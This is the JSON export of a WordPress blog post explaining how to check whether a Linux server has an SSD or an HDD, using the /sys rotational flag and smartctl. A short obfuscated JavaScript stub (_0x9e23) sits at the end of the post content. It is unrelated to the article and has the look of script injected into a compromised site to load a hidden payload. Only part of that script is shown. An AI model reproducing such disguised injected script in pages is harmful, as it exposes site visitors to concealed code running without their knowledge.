{"id":593,"date":"2021-12-22T08:38:42","date_gmt":"2021-12-22T08:38:42","guid":{"rendered":"https:\/\/hoganhost.com.ng\/blog\/?p=593"},"modified":"2024-08-12T13:34:43","modified_gmt":"2024-08-12T12:34:43","slug":"how-to-know-if-i-have-an-ssd-drive-or-hdd","status":"publish","type":"post","link":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/","title":{"rendered":"How to know if I have an SSD drive or HDD?"},"content":{"rendered":"<p><img fetchpriority=\"high\" decoding=\"async\" class=\"size-full wp-image-196 aligncenter\" src=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/02\/download-2.jpg\" alt=\"\" width=\"288\" height=\"175\" \/><\/p>\n<p>Sometimes our dedicated servers come with Solid State Drives, but\u2026 how can you really know that what\u2019s inside your box is an SSD or a HDD drive? On this post you will find ways to\u00a0know if I have an SSD drive or HDD running inside my box.<\/p>\n<p>As we all know, SSD drives are really well in terms of speed for our Linux servers. Are a little bit expensive than SATA, but they provide excellent performance 10x times better than SATA on most cases.<\/p>\n<h2>But how can I know if I have an SSD drive or HDD?<\/h2>\n<p>Since kernel version 2.6.29 you can check if your drive is a fast solid state drive or HDD using the following command:<\/p>\n<pre><code>cat \/sys\/block\/sda\/queue\/rotational\r\n<\/code><\/pre>\n<p>If you get 1 then it\u2019s a hard disk.<\/p>\n<p>If you get 0 then it\u2019s an solid state drive.<\/p>\n<h3>Alternative way to determine if drive is SSD or HDD<\/h3>\n<p><a href=\"https:\/\/www.smartmontools.org\/\" target=\"_blank\" rel=\"external nofollow noopener\">smartctl<\/a>\u00a0is the traditional disk health tool for all system administrators used to check disk health issues, but it can also help to retrieve the disk vendor details. Let\u2019s run smartctl to get the type of HDD that you have:<\/p>\n<pre>smartctl -a \/dev\/sda<\/pre>\n<p>Expected ouput:<\/p>\n<pre>root@localhost ~]# <strong>smartctl -a \/dev\/sda<\/strong>\r\nsmartctl 6.4 2015-06-04 r4109 [x86_64-linux-4.4.7-300.fc23.x86_64] (local build)\r\nCopyright (C) 2002-15, Bruce Allen, Christian Franke, www.smartmontools.org\r\n\r\n=== START OF INFORMATION SECTION ===\r\nModel Family:     SanDisk based SSDs\r\nDevice Model:     SanDisk SDSSDP128G\r\nSerial Number:    130773402659\r\nLU WWN Device Id: 5 001b44 97e48c023\r\nFirmware Version: 2.0.0\r\nUser Capacity:    128.035.676.160 bytes [128 GB]\r\nSector Size:      512 bytes logical\/physical\r\n<strong>Rotation Rate:    Solid State Device<\/strong><\/pre>\n<p>If you see this line \u201cRotation Rate: Solid State Device\u201d then you haven an Solid State Drive.<\/p>\n<p>If smartctl command is not found, try installing it using this command:<\/p>\n<pre>yum install smartmontools -y<\/pre>\n<h3><strong>Conclusion<\/strong><\/h3>\n<p>As you see, it\u2019s easy to know if I you have an SSD or HDD drive. If you know other ways to verify this kind of stuff, please let us know so we can add that information into the post.<br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Sometimes our dedicated servers come with Solid State Drives, but\u2026 how can you really know that what\u2019s inside your box [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":196,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[11,32,5],"tags":[],"class_list":["post-593","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-server","category-ssh","category-whm"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.6 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>How to know if I have an SSD drive or HDD? - HoganHost blog<\/title>\n<meta name=\"description\" content=\"Sometimes our dedicated servers come with Solid State Drives, but\u2026 how can you really know that what\u2019s inside your box is an SSD or a HDD\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"How to know if I have an SSD drive or HDD? - HoganHost blog\" \/>\n<meta property=\"og:description\" content=\"Sometimes our dedicated servers come with Solid State Drives, but\u2026 how can you really know that what\u2019s inside your box is an SSD or a HDD\" \/>\n<meta property=\"og:url\" content=\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/\" \/>\n<meta property=\"og:site_name\" content=\"HoganHost blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/facebook.com\/HoganHost\" \/>\n<meta property=\"article:published_time\" content=\"2021-12-22T08:38:42+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-08-12T12:34:43+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/02\/download-2.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"288\" \/>\n\t<meta property=\"og:image:height\" content=\"175\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Abigal okon\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@hoganhostng\" \/>\n<meta name=\"twitter:site\" content=\"@hoganhostng\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Abigal okon\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/\"},\"author\":{\"name\":\"Abigal okon\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a\"},\"headline\":\"How to know if I have an SSD drive or HDD?\",\"datePublished\":\"2021-12-22T08:38:42+00:00\",\"dateModified\":\"2024-08-12T12:34:43+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/\"},\"wordCount\":274,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#organization\"},\"image\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/02\/download-2.jpg\",\"articleSection\":[\"Server\",\"SSH\",\"whm\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/\",\"name\":\"How to know if I have an SSD drive or HDD? - HoganHost blog\",\"isPartOf\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/02\/download-2.jpg\",\"datePublished\":\"2021-12-22T08:38:42+00:00\",\"dateModified\":\"2024-08-12T12:34:43+00:00\",\"description\":\"Sometimes our dedicated servers come with Solid State Drives, but\u2026 how can you really know that what\u2019s inside your box is an SSD or a HDD\",\"breadcrumb\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/#primaryimage\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/02\/download-2.jpg\",\"contentUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/02\/download-2.jpg\",\"width\":288,\"height\":175},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/hoganhost.com.ng\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"How to know if I have an SSD drive or HDD?\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#website\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/\",\"name\":\"HoganHost blog\",\"description\":\"Keeping you connected to everything from HoganHost\",\"publisher\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/hoganhost.com.ng\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#organization\",\"name\":\"HoganHost\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png\",\"contentUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png\",\"width\":466,\"height\":387,\"caption\":\"HoganHost\"},\"image\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/facebook.com\/HoganHost\",\"https:\/\/x.com\/hoganhostng\",\"https:\/\/instagram.com\/officialhoganhost\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a\",\"name\":\"Abigal okon\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g\",\"caption\":\"Abigal okon\"},\"sameAs\":[\"https:\/\/hoganhost.com.ng\/blog\"],\"url\":\"https:\/\/hoganhost.com.ng\/blog\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"How to know if I have an SSD drive or HDD? - HoganHost blog","description":"Sometimes our dedicated servers come with Solid State Drives, but\u2026 how can you really know that what\u2019s inside your box is an SSD or a HDD","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/","og_locale":"en_US","og_type":"article","og_title":"How to know if I have an SSD drive or HDD? - HoganHost blog","og_description":"Sometimes our dedicated servers come with Solid State Drives, but\u2026 how can you really know that what\u2019s inside your box is an SSD or a HDD","og_url":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/","og_site_name":"HoganHost blog","article_publisher":"https:\/\/facebook.com\/HoganHost","article_published_time":"2021-12-22T08:38:42+00:00","article_modified_time":"2024-08-12T12:34:43+00:00","og_image":[{"width":288,"height":175,"url":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/02\/download-2.jpg","type":"image\/jpeg"}],"author":"Abigal okon","twitter_card":"summary_large_image","twitter_creator":"@hoganhostng","twitter_site":"@hoganhostng","twitter_misc":{"Written by":"Abigal okon","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/#article","isPartOf":{"@id":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/"},"author":{"name":"Abigal okon","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a"},"headline":"How to know if I have an SSD drive or HDD?","datePublished":"2021-12-22T08:38:42+00:00","dateModified":"2024-08-12T12:34:43+00:00","mainEntityOfPage":{"@id":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/"},"wordCount":274,"commentCount":0,"publisher":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#organization"},"image":{"@id":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/#primaryimage"},"thumbnailUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/02\/download-2.jpg","articleSection":["Server","SSH","whm"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/","url":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/","name":"How to know if I have an SSD drive or HDD? - HoganHost blog","isPartOf":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/#primaryimage"},"image":{"@id":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/#primaryimage"},"thumbnailUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/02\/download-2.jpg","datePublished":"2021-12-22T08:38:42+00:00","dateModified":"2024-08-12T12:34:43+00:00","description":"Sometimes our dedicated servers come with Solid State Drives, but\u2026 how can you really know that what\u2019s inside your box is an SSD or a HDD","breadcrumb":{"@id":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/#primaryimage","url":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/02\/download-2.jpg","contentUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/02\/download-2.jpg","width":288,"height":175},{"@type":"BreadcrumbList","@id":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/whm\/how-to-know-if-i-have-an-ssd-drive-or-hdd\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/hoganhost.com.ng\/blog\/"},{"@type":"ListItem","position":2,"name":"How to know if I have an SSD drive or HDD?"}]},{"@type":"WebSite","@id":"https:\/\/hoganhost.com.ng\/blog\/#website","url":"https:\/\/hoganhost.com.ng\/blog\/","name":"HoganHost blog","description":"Keeping you connected to everything from HoganHost","publisher":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/hoganhost.com.ng\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/hoganhost.com.ng\/blog\/#organization","name":"HoganHost","url":"https:\/\/hoganhost.com.ng\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png","contentUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png","width":466,"height":387,"caption":"HoganHost"},"image":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/facebook.com\/HoganHost","https:\/\/x.com\/hoganhostng","https:\/\/instagram.com\/officialhoganhost"]},{"@type":"Person","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a","name":"Abigal okon","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g","caption":"Abigal okon"},"sameAs":["https:\/\/hoganhost.com.ng\/blog"],"url":"https:\/\/hoganhost.com.ng\/blog\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts\/593","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/comments?post=593"}],"version-history":[{"count":2,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts\/593\/revisions"}],"predecessor-version":[{"id":603,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts\/593\/revisions\/603"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/media\/196"}],"wp:attachment":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/media?parent=593"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/categories?post=593"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/tags?post=593"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}